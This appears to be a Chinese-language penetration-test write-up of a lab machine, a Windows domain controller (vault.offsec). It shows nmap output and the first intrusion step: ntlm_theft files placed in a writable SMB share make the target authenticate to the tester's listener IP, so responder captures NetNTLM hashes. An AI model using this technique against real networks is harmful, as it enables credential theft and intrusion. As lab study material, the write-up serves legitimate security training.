PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 49666/tcp open unknown 49668/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49679/tcp open unknown 49703/tcp open unknown 49797/tcp open unknown
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-24 06:25:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=DC.vault.offsec | Not valid before: 2025-09-23T06:17:10 |_Not valid after: 2026-03-25T06:17:10 |_ssl-date: 2025-09-24T06:26:52+00:00; -3s from scanner time. | rdp-ntlm-info: | Target_Name: VAULT | NetBIOS_Domain_Name: VAULT | NetBIOS_Computer_Name: DC | DNS_Domain_Name: vault.offsec | DNS_Computer_Name: DC.vault.offsec | DNS_Tree_Name: vault.offsec | Product_Version: 10.0.17763 |_ System_Time: 2025-09-24T06:26:13+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49703/tcp open msrpc Microsoft Windows RPC 49797/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
系统为 Windows 域环境,开放有 RDP、WINRM 和 Windows 域控的一些默认服务。
域控域名、KDC:
1 2 3 4
# 域名 vault.offsec # KDC dc.vault.offsec
3.2 渗透测试突破边界
3.2.1 SMB 共享目录窃取 Anirudh 用户 NET NTLM Hash
在 kali 添加靶机域名解析:
1
echo"192.168.213.172\tdc.vault.offsec vault.offsec" | sudotee -a /etc/hosts
靶机 SMB DocumentsShare 目录存在写入权限,文件夹英文字面为文件共享的意思,猜测靶机可能存在计划任务访问该文件夹,由于系统属于 Windows 环境,可使用 ntlm_theft 工具生成包含恶意访问的文件,然后在 kali 使用 responder 开启监听,最后在 DocumentsShare 目录上传恶意访问文件,尝试抓取 Windows NET NTLM Hash。
1
https://github.com/Greenwolf/ntlm_theft
1
python3 ntlm_theft.py -g all -s 192.168.45.227 -f f0ne